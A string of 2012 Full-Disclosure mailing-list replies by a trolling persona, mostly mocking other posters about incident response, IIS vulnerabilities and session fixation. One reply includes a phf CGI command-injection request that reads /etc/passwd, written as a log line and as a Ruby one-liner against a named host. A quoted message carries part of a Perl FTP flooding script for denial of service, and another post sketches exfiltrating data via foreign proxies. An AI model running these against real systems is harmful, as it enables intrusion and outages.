Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-30 Thread Григорий Братислава
On Fri, Jul 27, 2012 at 3:17 PM, Scott Solmonson  wrote:
>
> Funny, I now want to watch Goldeneye for some reason...

Funnier is now I want to watch Dumb and Dumber for obvious reason.

> 
>
> Everything you mention are parts of critical infrastructure.
> Any organization/nation that claims to have its shit together will
> have triple-redundancy, with complete isolation, and optimally
> geographical dispersion in place, for said industries.
>
> Read again what I said:

Triple redundancy? Is many company not even have single redundancy.
You read too much sci-fi is please stop spread false information on
list. List is filled with too many is noobs look to learn, not hear
nonsense.

Amazon, Twitter, Citibank, BofA and is many others all went down is
this past week. All is companies has more money than God and is has
competent CERTIFIED staff. Yet is they could not even is keep site up.
Maybe is since you can, you can become CTO of is any one of these
companies yes.

> Your example of critical infrastructure confirms this.
> It's better for banking transactions to no be made, versus for them to
> go to the wrong account with the wrong amount.
> It's better for a doctor to potentially have to make a quick judgement
> call, versus giving the wrong procedure to the wrong patient.
> It's better for the power plant to go down versus overspinning the
> turbines, or shutting off the reactor cooling, and exploding or
> melting down.

Is better for banking transactions not to be made? Is this same for
NASDAQ as this is transaction. No is better for business to CONTINUE -
this is the C in BC (Business *CONTINUITY*). Transactions is can be
audited on the fly.

Doctor make wrong call? Speak and Spell. Is no one say anything about
Doctor. Doctor would be too late. Go back and read is what was
written. "if the patient alert system is affected" If patient cannot
call Doctor or Nurse because help button is tampered with: Goodbye you
are the weakest link"

Exploding or melting down? Maybe perhaps is you watch too many time
Die Hard. In is real environment, turbines and is other HMIs can be
addressed by is taking *only* is that turbine and
baselining-shifting-outsourcing-outpulsing power to other turbines
*without* taking out the mid-west. Perhaps you is go back to work in
real environment then come and try and is to test MusntLive. Is your
comment show many much immaturity. Is MusntLive now pray your bosses
not see these posts.

> It's better for the airplanes to have to circle for a bit more versus
> sending two on to the same runway at the same time.
> etc.
> etc.
> etc

Really? Is not better to send them to another *open* runaway versus is
has them circle skies burning fuel, jamming up skies?

*is grab popcorn - like DUmb and Dumber stupid movie*

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] DC

2012-07-26 Thread Григорий Братислава
<%= question %>

Is who is go want to meet and has is Stoli shots with MusntLive.
MusntLive is stay at Bellagio and is scope everything under radar.
Watch C Miller with eagle eye.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-26 Thread Григорий Братислава
On Thu, Jul 26, 2012 at 9:40 AM,   wrote:

> But unfortunately, you're right - most places have screwed up their DR 
> planning
> and can't shut down.  They've also screwed up their network config so it 
> isn't trivial
> to track down which port a problem attacker is on. (And yes, tracking down a
> miscreant at level 2/3 *is* trivial if your network is in fact properly 
> designed
> and managed)

Once upon is time people cry-- "no more free bugs" and is now
MusntLive chant-- "no more is free security schooling!"

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-26 Thread Григорий Братислава
On Wed, Jul 25, 2012 at 3:36 PM, Scott Solmonson  wrote:
> I can't tell if I'm being trolled or not...
>

Inline is MusntLive's comments! MusntLive is now give you guys is some
free training on is Incident Response and is Forensics and is
CCD{A,P,E}. Is first MustnLive watch really good movie and is use
quote from is movie:

"Hello Scott. I want to play a game. So far what loosely could be
called security, you have made your postings rambling nonsense which
would make organizations like ISC2 and ISACA proud. Ramblings which
will shall now be shredded to bit. I call you unworthy of responding
to my posts. Of the chances you have been given, you have cherished
none. The packets in these posts are filled with information.
Information you do not seem to grasp. If you do not change your ways
and heed the information given to you, organizations like ISC2 and
ISACA will continue to pollute your brain. Your brain will close.
Think of this information like a venus flytrap. What you are looking
at right now is the information that can set you free. Do not heed
this information and security nonsense will swallow you whole.
Consuming your body into a herd of wandering security zombies. Each
with a title: CISSP, CISM, CISA, CEH." --- MusntLive is play security
Jigsaw

> Whatever layer-2 feats you've performed or will continue to perform,
> you're still very trackable and monitoring/blocking you at layer-3 is
> trivial.

Is so very trivial is how so many fester in networks globally
undetected. Yes MusntLive understand you are karate kid.

> Remote-to-machine or remote-to-network? Ultimately I can just say it
> again: Whatever layer-2 feats you've performed or continue to perform,
> you're still very trackable and monitoring/blocking you at layer-3 is
> trivial.

Monitoring and tracking on is any layer is trivial? How many is
enterprise networks is has you worked on.?

> You've figured it out- tap-port the entire switch's traffic, and then
> once you've got what you need, shut down every port. Once data
> integrity has been compromised, service downtime is almost always the
> lesser cost.

MusntLive is show you how you fail across many 'vertical' industries.

BANKING
---
Sample Bank's {N,S}OC is running 10 42Us is filled with servers. Seven
42Us is filled with 1U servers. One 42U is Oracle M9000, one 42U is
has QFX3000M fully populated (6,144 10GbE ports) one 42U is has take
your pick, EX, Cat, BigIron. MusntLive is compromise a 1U somewhere on
a 42U. All racks is run the bank's business. MusntLive broadcast to
all on network.

You call Gigamon and buy your G-TAP to watch me. Once you "got what
you need, you shut down every port" is you say. Really? Shut all ports
down? "Integrity is compromised, service downtime" (DR/BCP nonsense).
Now what? You still is not find me.

Because each 1U is kind of is new, you now need to figure out is what
happened where. Each 1U is has half TB data. You now need image these
1Us for your investigation. Is remember is bank you need report to
clients as is they have credit card transaction. Forget is fact your
bank is will lose more money more you have downtime. Have you is done
your homework. What is your estimated MTTR? (CCDP term for you is
learn this afternoon).

I think Scott you work on network where is has at max 5 Cat 2950s as
is your statement not valid even is remotely in the banking industry.

HEALTHCARE
---
Sample Hospitals {S,N}OC is has 1 42U. Is five racks has 48 port
switch, 10 has 2U servers and is each server has 4 network ports. You
has firewalls, SSL appliances, DB and is special server to link to
room so is when patients ring emergency bell, nurses come running is
like flock of seagull (and I ran, ran so far away). You will shut down
all is switchport here now too also?

MusntLive is not go further into your nonsense reply.

SCADA
---
Sample hydroelectrical plant...

Really? Shut down all ports?

Sample gas plant...

Really? Shut down all ports?


MIL/GOV
---
Sample USCYBERCOM

Really? Shut down is Pentagon?

Sample IC.FBI.GOV

Really? Shut down is entire racks? Because you will have
backup/standby entire 42Us?


MusntLive chuckle. Is you has not even answer "how you will find me"
is you really think pulling plug is save you. Lets make believe is
your plan work. You pull plug on all ports (shut them down is what you
say). Now comes fun stuff!

You call up DigitalIntelligence. Even in is small hospital you is has
to image 10 drives (small disks remember MusntLive is say half TB).
5TB to image because since is your rack is infected, you must image to
retain forensically sound is evidence. After you call the company
DigitalIntelligence, they have is fastest network based imaging
system. 6.6Gb a minute.

MusntLive make believe DigitalIntelligence make delivery in 1hr and
you can is start imaging! How much downtime is passed before your
imaging is done? Don't worry you can is tell patients, surgeons, ER
room: "se

Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-25 Thread Григорий Братислава
On Wed, Jul 25, 2012 at 7:04 AM, Giles Coochey  wrote:
> On 18/07/2012 13:10, Григорий Братислава wrote:

> If you broadcast using a MAC address you are on the same subnet, layer 2.
>
> On a wired network I don't really care whether you spoofed your mac address
> or not, you still registered the mac address on the switch, and I can see
> what port you connected to. Then I just need to follow the cable to find
> you.
>
> In any case, this is an internal intrusion or post-exploitation issue we're
> talking about, not an external one, assuming the layer-2 environment has a
> modicum of protection.

MusntLive is now beg of you is to allow me to is join your groupstudy!

MusntLive is live on the edge of assumption! In is case of
internal/post-exploitation is reality of matter is you will not find
me. You can is assume you will but we all is know where assume lead
(http://www.youtube.com/watch?v=6hrLj8QEAgI)

Is I am on your network, good luck is find me especially in is post
exploitation as I am is liable to float around is piggyback from one
machine is to the next. You can is assume all you want about port
security in is in fact, utterly worthless in post exploitation as is
likely I am not even in your physical network. Please is go back to
CCNA studies and is stop bastardize is something you know a
''modicum'' of is about. You fail is off jump with word 'assume'

So let us is go back to the beginning since you is fail to understand.
Pay is close attention for you is not learn this with Lammle.

1) MusntLive is perform remote exploit and is get on your machine
2) MusntLive exploits is "other" machines and send broadcast via
spoofing on "OTHER" compromised machines
3) MusntLive is listen for broadcast on any compromised machine

You is expect to track me how? Everyone is listen. Is you can go
narrow down who is broadcast. Even turn of port! I am is still listen
and is will still start again. What is it you is think you will do?
Shut down all ports everywhere? Is maybe BCP filter? URPF? Is you
think so, you is definitely need lay off Lammle and is read
Oppenheimer, Baker, and is too many others you is obviously not ready
for.

MusntLive like this game. Now you come back and is counter, then I
come is back and is counter you to smitheruskis!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] About IBM: results

2012-07-19 Thread Григорий Братислава
On Thu, Jul 19, 2012 at 9:31 AM, MustLive  wrote:

> - During 16.05-20.05 I've wrote five advisories via contact form at IBM
> site. No reaction from "IT security".
> - At 20.05 I've contacted "Software support". Received formal answer.
> - At 20.05 informed support, that this is security issues (not something
> small, which they can just ignore) and they need to sent it to security
> department. Again received formal answer - this time with "call me maybe"
> paragraph :-). In result IBM employees just ignored.
> - At 30.05, after recommendation from the list to contact directly, I've
> contacted IBM PSIRT directly. They said they didn't received anything, not
> from me via contact form, nor from support. The same as they didn't do
> anything (no security audit of their software) to make this multiple
> vulnerabilities in multiple IBM software to go to the wild.
> - At 31.05 I've resend five advisories, which they received and said they
> would send them to the developers (of Lotus products).
> - At 06.06, after silence from PSIRT, I've reminded them. They said there is
> still no info from developers, so wait please (until they will format their
> brains to work faster).
> - At 10.07, after more then month of silence since last time from PSIRT,
> I've reminded them. No answer from them. This looks like IBM developers have
> decided to ignore these vulnerabilities.
> - At 14.07 I've informed IBM PSIRT, that due to their ignoring I'd plan
> public disclosure of these vulnerabilities on July.
> - At 18.07, 12:06 AM, PSIRT answered (after 1,5 months of silence) and said
> that previous day they had meeting with developers, which were working on
> these issues, and they started to fix them. No concrete deadline, they just
> started (and I'll be informed about the date, the same as they told me at
> 31.05). OK, let's give them more time.

Maybe IBM is see who you are and is just chuckle because none of your
advisories is ever worth anything?

Perhaps is maybe yes, IBM is read through BS, nonsense, BSnonsense, NonsenseBS?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [Anonymous/iWot] Somaleaks !!!

2012-07-19 Thread Григорий Братислава
On Thu, Jul 19, 2012 at 9:53 AM,   wrote:

> Cool story, bro.  Too bad you're going after terrorists rather than the *real*
> threat to our society - those who are destroying our civil liberties and way 
> of
> life in the name of "protecting us from terrorists".

In US, there is what is called is NRA no. Is same argument you make:

Guns is not kill people - - -

Is safe to say: Don't is go after gun owners, go after bullet maker?
(http://www.hornady.com/ammunition/zombiemax/)?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-19 Thread Григорий Братислава
On Wed, Jul 18, 2012 at 12:20 PM, Scott Solmonson  wrote:
> Shortcutting other responses-

> 2) assume the worst, don't isolate, monitor spread tactics,
> perceptually contain and then analyse.

This is make sense! Do not isolate. Let hacker run rampant in is your
network. Because if they is damage your network in is process of not
isolating them, is ok if they is steal and delete. You get to see what
is they stole after is gone, and after they is wipe your system. This
is good advice yes, help test your BC/DR! MusntLive like absurd and
obscure approach!

> Endgame is always close the hole, restore the data, learn from your
> mistakes that allowed it to happen :)

MusntLive is love your advice!

According to you:

1) Let hacker run amok so you can see them is run amok
2) Once hacker is run amok, steal your bread and is butter, wipe your
systems, restore
3) Go back and is learn why they steal and delete.

MusntLive think answer for #3) is logic one: "Idiot admin allowed is
this to happen"

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-18 Thread Григорий Братислава
On Wed, Jul 18, 2012 at 8:30 AM, alex  wrote:
> Source MAC faking would result in switchport shutdown in some environments.
> Further you cannot communicate with outside world using broadcasts.
> ICMP payloads is quite common and hard to detect.
>
> Me study CISSP, too. Already CCNA Security. CCNA not worth the money. Better 
> get CISA/CISM.
>
>

You miss point. If I sent data to broadcast, original poster is say:
"I will know who you are via MAC address" to which I say: "You is need
to go back to Cisco bootcamp" Everyone is receive broadcast, no way
for him to detect who I am since I am is not alone in receiving the
broadcast. Needle in is haystack.

Second, ICMP tunneling, GRE tunneling is too much trouble. Advanced
Persistent Threats as defined by (is now give North Korean title to
him) Super Grand Master of the Internet Universe Richard Bejtlich as
advanced and is persistent. But is also stupid and lazy. Will not
waste time on this is vector. Will use SSL and HTTP to is stay under
radar.

Attacker >>> Own is your data >>> post data in $WBEDIR >>> visit
$WEBDIR using proxy [small packets]

Is how else can attacker download 867 terabytes of data
(http://www.eddupdate.com/2012/02/cyberthieves-stole-867-terabytes-in-2011.html)?
You believe attackers is using FTP, ICMP, GRE tunnels? No. Too noisy
is this. Better to visit website like everyone else use proxy of
another country, this is country take blame.

MusntLive >>> use is never use 213.24.76.77 address >>> use proxy
210.75.193.49 >>> download data \
Supreme Grand Master of Internet Universe >>> analyze >>> see proxy
>>> chant APT APT APT >>> See I told you is China \
Fox News >>> report on Chinese threat \
MusntLive >>> facepalm at report and go back is drink Stoli

CISA/CISM is have nothing on InfoSecInstitute!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-18 Thread Григорий Братислава
On Wed, Jul 18, 2012 at 3:18 AM, Giles Coochey  wrote:

>> Is you have much more to worry than is ICMP/GRE tunnels. Is I send to
>> Broadcast and I am is on your network, how do you is plan to pinpoint
>> who I am when is everyone see broadcast
>
> By your source MAC address
>
>
> --
> Regards,

Really? I am so glad your company is has you for security. So a
message is broadcast to everyone. Everyone on say is /21 is listen and
you is going to pick me out, out of is everyone else who is listen?
Genius! Nobel Prize A+++ number one is seller! Is not only is idea you
mention genius, is good that no one can is change their MAC address!
Is proof MusntLive must go back is study CISSP and now is CCNA

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-17 Thread Григорий Братислава
On Mon, Jul 16, 2012 at 10:35 AM, Giles Coochey  wrote:
> On 16/07/2012 14:48, Gary Baribault wrote:
>
> I suggest one of the first answers was the good one, intercept the traffic
> routed to the internet with TCPDump. Filter out the normal traffic and see
> what's left. All compromised systems talk to the Internet to dump data or
> route spam. Be patient, some systems talk all the time, some once an hour ..
> but you will find some unexplained traffic. Once you do find that you're
> infected, don't bother cleaning up the system, format and restore the data!
>

Is you have much more to worry than is ICMP/GRE tunnels. Is I send to
Broadcast and I am is on your network, how do you is plan to pinpoint
who I am when is everyone see broadcast

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

2012-07-17 Thread Григорий Братислава
Again is worth to repeat: MusntLive is serious security researcher. Is
you have been round block is long enough, is clues let you know is how
I am is real deal. Is joke on skiddies is like yourself is you not
discover this. MusntLive go back to dirty days of TYM and Well but
your is not ready.

On Tue, Jul 17, 2012 at 1:47 PM, NETT Dave  wrote:
> Oh and see his posts, he also likes to suck Thor balls. Who knows why.
>
> 
> From: NETT Dave 
> To: Gage Bystrom ; Григорий Братислава
> ; "full-disclosure@lists.grok.org.uk"
> 
> Sent: Tuesday, July 17, 2012 7:43 PM
>
> Subject: Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft
> July Security Bulletin
>
> Musntlive has never been funny. Just another bored teen who found the FD
> address in "Hackers Handbook for Dummies".
>
> ____
> From: Gage Bystrom 
> To: Григорий Братислава ;
> "full-disclosure@lists.grok.org.uk" 
> Sent: Tuesday, July 17, 2012 7:30 PM
> Subject: Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft
> July Security Bulletin
>
> /*PoC*/
> Sorry no automated code yet :( can verify manually as follows:
> Read musntlive's post. If it is similar to multiple previous posts check if
> still funny.
> Notice how you get a return value of nope.
> /EoF
> I can haz CVE now :(?
> On Jul 17, 2012 10:10 AM, "Григорий Братислава"  wrote:
>
> And you can is prove this theory is how?
>
> On Tue, Jul 17, 2012 at 1:09 PM, Gage Bystrom 
> wrote:
>> Hello Full Disclosure! I is warn you about musntlive!
>>
>> He is use old joke over over again. Not funny!
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>



-- 

`Wherever I is go - there am I routed`

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

2012-07-17 Thread Григорий Братислава
On Tue, Jul 17, 2012 at 1:43 PM, NETT Dave  wrote:
> Musntlive has never been funny. Just another bored teen who found the FD
> address in "Hackers Handbook for Dummies".


MusntLive is serious security researcher. Everyone who is read between
is line this is evident. Is for those like you who is respond who joke
is on see?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

2012-07-17 Thread Григорий Братислава
And you can is prove this theory is how?

On Tue, Jul 17, 2012 at 1:09 PM, Gage Bystrom  wrote:
> Hello Full Disclosure! I is warn you about musntlive!
>
> He is use old joke over over again. Not funny!
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

2012-07-17 Thread Григорий Братислава
On Tue, Jul 17, 2012 at 10:11 AM, king cope
 wrote:
> Hello Jan,
> I did some additional tests for the IIS bugs.
>
> * IIS 6.0 PHP authentication bypass is only possible on Windows Server
> 2003 SP1. SP2 seems unaffected
>   So take that bug as resolved, my mistake as I didn't have a fully
> patched system online when testing.

kingcope are we is release advisories to patched software? Is so, then
I introduce exploit along with you.

Hello full disclosure!! !! !!

Is like to warn you about phf vulnerability. Is hackers can get your
password list in is unpatched server.

PoC on is my system:

213.24.76.77 - - [17/July/2012:23:17:47 -0700] "GET
/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -

In Ruby (here we is own rsnake):

require 'open-uri'
open('http://www.webfringe.org/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd
HTTP/1.0'){ |f| print f.read }

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

2012-07-17 Thread Григорий Братислава
On Tue, Jul 17, 2012 at 6:44 AM, Jan Reilink  wrote:

> I can't reproduce authentication bypass vulnerabilities you mention.
> Also, there is more than one way to password protect a directory. Did
> you disable 'anonymous authentication' in IIS 6.0/7.5, or did you remove
> or deny IUSR-user NTFS permissions on the file system?
>

Is this silly question! Of course he is not remove and is deny
permissions. Then he is not can make vulnerability disclosure.

If is I leave my door open then I am is vulnerable to robber is take
my family jewels. I can is go to congress and pitch law for stand my
ground. If I is lock my door, I has nothing to say.

Hello full disclosure!! !! !!

MusntLive is like to warn you about
disclosure-via-brownie-get-is-your-name-polluted-intouseless-cve-advisory-politics...

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

2012-07-16 Thread Григорий Братислава
LE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT',
> 'HELP','MODE','APPE','STRU','SITE','SITE INDEX',
> 'TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD',
> 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM',
> 'SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE
> INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I',
> 'NLST','CWD','STOR','RETR','MKD','RMD',
> 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE',
> 'STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE
> I','NLST','CWD','STOR','RETR','MKD','RMD','DELE',
> 'RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE
> INDEX','TYPE','TYPE A','TYPE E',
> 'TYPE L','TYPE I','NLST','CWD','STOR','RETR','MKD','RMD',
> 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP',
> 'MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A',
> );
> print "Dosing Server!\n";
> $pm = new Parallel::ForkManager(40);
> while (1) {
> my $pid = $pm->start and next;
>COMMAND_LIST: foreach $cmd (@command){
> foreach $poc (@junk){
> LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host,
> PeerPort=>$port, Proto=>'tcp', Timeout=>30);
> if(defined($sock4)){
> $sock4->send("$cmd"." "."$poc\r\n", 0);
> $sock4->recv($content, 100, 0);
> }
> }
> }
>   $pm->finish;
> }
>
>
> On Mon, Jul 16, 2012 at 11:54 AM, Григорий Братислава
>  wrote:
>> On Mon, Jul 16, 2012 at 2:50 PM, kaveh ghaemmaghami
>>  wrote:
>>> Hello list
>>> in my testing environment (IIS 6 with php5 ) the flaw exist . i
>>> think i got da move to XAMPP MS wont patch it   LOL
>>>
>>
>>
>> Test environment is not production environment. Is place your test
>> server in your production network and is send me information for to
>> test.



-- 

`Wherever I is go - there am I routed`

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

2012-07-16 Thread Григорий Братислава
On Mon, Jul 16, 2012 at 2:50 PM, kaveh ghaemmaghami
 wrote:
> Hello list
> in my testing environment (IIS 6 with php5 ) the flaw exist . i
> think i got da move to XAMPP MS wont patch it   LOL
>


Test environment is not production environment. Is place your test
server in your production network and is send me information for to
test.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

2012-07-16 Thread Григорий Братислава
On Mon, Jul 16, 2012 at 2:20 PM, king cope
 wrote:
> Don't feed the trolls :D
> btw it's real, it's not my fault you don't understand.
> consult the attachment


MusntLive is no troll. Is question to be asked. If is tree fall on top
of you in if forest, believe you is me, is no matter is you hear it.
MusntLive is work in ultra compartmentislized environment. Attachment
is strip. Is can you please send in emacs format?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-16 Thread Григорий Братислава
On Sat, Jul 14, 2012 at 8:46 AM, Ali Varshovi  wrote:
> Greetings FD,
>
> Does anyone have any guidelines/useful material on analysis logs of a Linux 
> machine to detect signs of compromise? The data collection piece is not a 
> challenge as a lot of useful information can be captured using commands and 
> some scripts. I'm wondering if there is any systematic approach to analyze 
> the collected logs? Most of the materials I've seen are more aligned to 
> malware and rootkit detection which is not the only concern apparently.
>
> Thanks,
> Ali

Is in my experience is that I place two folders in directory in is
root folder called /root/MilaKunisLeakedPhotos/ and
/root/OlgaKurlyenko/ is when I see is accessed. Then I know is my
machine compromised. Everyone is want see Olga and Mila

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

2012-07-16 Thread Григорий Братислава
On Mon, Jul 16, 2012 at 1:54 PM, Thor (Hammer of God)
 wrote:
> Right - if you've compromised the server to the point you can alter
> directory structures/names, the you've already bypassed the ACLs required
> in order to "exploit" the vulnerability that allows you to bypass the
> ACLs.  I don't get it.
>
> t

Please forgive him. Is only kingcope. For minute he is go loon and is
this evident as is he not breaking BSD.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

2012-07-16 Thread Григорий Братислава
On Mon, Jul 16, 2012 at 1:24 PM, king cope
 wrote:
> Hi Lists,
>
> it seems Microsoft doesn't want to patch the vulnerabilities I posted
> back in June,
> at least not in the July update.
>

Hello Full Disclosure!! !! !!

Is like to introduce you to Schrödinger's Cat and Wigner's Friend in
is Computer Security. 'The Wigner's Friend thought experiment posits a
friend of Wigner who performs the Schrödinger's cat experiment after
Wigner leaves the laboratory. Only when he returns does Wigner learn
the result of the experiment from his friend, that is, whether the cat
is alive or dead. The question is raised: was the state of the system
a superposition of "dead cat/sad friend" and "live cat/happy friend,"
only determined when Wigner learned the result of the experiment, or
was it determined at some previous point?'

http://en.wikipedia.org/wiki/Wigner's_friend
http://en.wikipedia.org/wiki/Schr%C3%B6dinger%27s_cat

IIS is neither vulnerable or not vulnerable. Is until you is exploit
it and verify!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] 0x00: MustntLive not he is robot.

2012-07-13 Thread Григорий Братислава
On Fri, Jul 13, 2012 at 8:35 AM, Fatherlaptop  wrote:
> No...more like Yoda.
>

Is Yoda you mean is from Star Wars?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-13 Thread Григорий Братислава
On Fri, Jul 13, 2012 at 7:23 AM, Gokhan Muharremoglu
 wrote:
> Ok. It seems i have to explain this vulnerability's effects with another
> scenario.
>
> This is a real life scenario and i wrote it in a Turkish article for
> National Information Security Portal which is run by TUBITAK.
>
> Article in Turkish with scenario =>
> http://www.iosec.org/oturum_oncesi_tanimli_cerez.pdf
>
> I  will explain it in English now.
>
> There are KIOSK/Terminal machines at bank branches in Turkey. Customers can
> reach to the regular Internet banking applicaton from here.

This is real life common sense is answer. "So you walk into a bank"
are you is serious?

Is most stupid example than Security Chicken Tim. I am is walk into
bank to do this stupidity while I am on is camera?

Where are you is new 10 year and is under experience security freaks
come is from?

Hello Full Disclosure!! !! !!

Is like to warn you about is robbing banks without is mask and waving to camera

pizda

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-13 Thread Григорий Братислава
PS (is excuse my manner) is no take my message about your is nonsense
personal Tim. MusntLive is most respect Chicken Soldiers and Soldier
Chickens. MusntLive is never discriminate even is against poultry.
MusntLive is support PETA

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-13 Thread Григорий Братислава
On 7/13/2012 12:07 PM, Tim wrote:

> Suppose an application runs solely over HTTPS and assigns cookies
> with the secure flag.  However, user sessions are assigned before
> login and they don't refresh their session cookies upon user login.
> In this case, users are still vulnerable to MitM:

This nonsense you waste your time is write is not a cause for concern.
Simply because of is use of the word "suppose." Suppose is aliens
visited us. Suppose is Elvis was alive. Suppose is the tooth fairy
visited you. Too many is variables to deal with.

> 1. An attacker gains access to view and modify unencrypted traffic
> between a user and the application.

In is most cases of malware and trojans a) bad-executables is tend to
install keyloggers anyway so is credentials are stolen b) MITM is too
complex and is time consumer of attack for financialisly related
organized crime groups. You think they is patient?. Why bother MITM
when keystroke loggers work fine. c) MITM is pointless when is
screenshots accompany keystroke logging d) Storing information is to
decrypt later takes up more space than necessary. More is space is
raise likelihood of detection.

MusntLiv is deleted 2,3,4 nonsense you is write: TL;DR;TMN (Too Much Nonsense)

> 5. Upon attempting to access the HTTP version of the vulnerable
> application (which of course doesn't exist), the attacker again
> intercepts this and replaces the HTTP response.  In this response, a
> Set-Cookie header is included which provides the victim's browser with
> the application session that the attacker retrieved in step 2.

Malware organizations is re-use tried, and true methods that work
over, and is over. Your's whole message to this list is based on
theory.

Deleting 7, 8 TL;DR;TMN

> This is complicated, but it's not that much more complicated than what
> existing MitM tools, such as sslstrip, already do.

You is have been reading too many documents on InfoSecInstitute. I
suggest you is go analyze the top 20 crimepacks and you is will see
that is easier for criminals to get data without is using MITM
attacks.

MITM is now become poster boy hacker talk meant to prop FUD. "OMG you
could be the potential victim of a possible MITM attack. This is why
http://writingdead.com/wp-content/uploads/2011/03/chaos-math-pic.gif";

> Note that another variant of this attack is possible if the victim's
> browser silently accepts third-party cookies (which most do by
> default) and is able to convince a user to visit any malicious site.
